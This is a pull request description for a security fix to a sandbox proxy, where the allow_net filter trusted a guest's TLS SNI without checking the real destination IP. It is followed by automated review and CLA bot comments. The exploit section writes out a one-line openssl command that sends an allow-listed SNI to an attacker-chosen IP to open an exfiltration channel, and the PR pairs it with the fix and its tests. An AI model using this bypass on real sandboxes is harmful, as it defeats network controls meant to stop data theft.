fix(net): bind allow_net SNI inspection to the real destination IP

[G4614]

Summary

Source-level security audit fix for the headline finding. The allow_net TCP
filter trusted the guest-supplied SNI/Host alone: inspectAndForward checked
filter.MatchesHostname(SNI) and then dialed the guest-chosen destination IP
without verifying the two belong together.

Exploit: with allow_net=["api.openai.com"], a guest runs
openssl s_client -connect 203.0.113.9:443 -servername api.openai.com (or any
client sending an allow-listed SNI/Host to an attacker IP). The SNI matches, so
the proxy forwards the raw TLS stream to 203.0.113.9 — a data-exfiltration
channel to any host, defeating the allowlist. The DNS sinkhole doesn't help: the
attack hard-codes the IP and never resolves.

Fix (bridge side — universal layer)

TCPFilter.AllowsConnection(hostname, destIP) binds the decision to the real
destination IP: the SNI must match a rule and destIP must be a real address
for an allowed host —

• exact hosts: destIP must be one of the IPs the allow_net DNS sinkhole
  already resolved (the exact addresses the guest itself received) — sourced from
  the DNS zone records, so there is no second, possibly-divergent resolution that
  could false-reject legitimate CDN traffic;
• wildcard hosts (subdomains aren't pre-resolved): the SNI is resolved at
  connection time and destIP must be in the result.

Resolved IPs are kept in a separate set so this does not widen which ports
decideTCPRoute permits.

This covers every caller (REST, local SDK, CLI). It is the bridge-side layer
of a defense-in-depth pair; the REST-side layer (resolve hostnames to /32 CIDRs
at box-create time) is #693. The two compose: for REST-created boxes the
allowlist arrives as IPs and the IP path handles it; this filter is the universal
backstop for everyone else.

Test (two-sided)

TestTCPFilter_AllowsConnection_BindsSNItoIP: an allow-listed SNI toward an
attacker IP — and a wildcard SNI toward an attacker IP — are blocked, while the
sinkhole-resolved IP and the live-resolved wildcard subdomain IP pass. Reverting
AllowsConnection to the pre-fix SNI-only check makes both attacker cases pass
and the test fails. TestResolvedHostIPsFromZones covers the sinkhole→filter
glue (extracts real A-record IPs, ignores wildcard regexp records and the
0.0.0.0 sinkhole default). Full gvproxy-bridge suite + go vet green.

Audit finding #1 (high).

🤖 Generated with Claude Code

[coderabbitai]

Important

Review skipped

Draft detected.

Please check the settings in the CodeRabbit UI or the .coderabbit.yaml file in this repository. To trigger a single review, invoke the @coderabbitai review command.

⚙️ Run configuration

Configuration used: defaults

Review profile: CHILL

Plan: Pro Plus

Run ID: 75b1fede-b29e-4d97-9db3-c902823f615e

You can disable this status message by setting the reviews.review_status to false in the CodeRabbit configuration file.

Use the checkbox below for a quick retry:

• 🔍 Trigger review

✨ Finishing Touches

🧪 Generate unit tests (beta)

• Create PR with unit tests

---

_{Comment @coderabbitai help to get the list of available commands and usage tips.}

[cla-assistant]

Thank you for your submission! We really appreciate it. Like many open source projects, we ask that you sign our Contributor License Agreement before we can accept your contribution.

---

boxlite security fixes seems not to be a GitHub user. You need a GitHub account to be able to sign the CLA. If you have already a GitHub account, please add the email address used for this commit to your account.
_{You have signed the CLA already but the status is still pending? Let us recheck it.}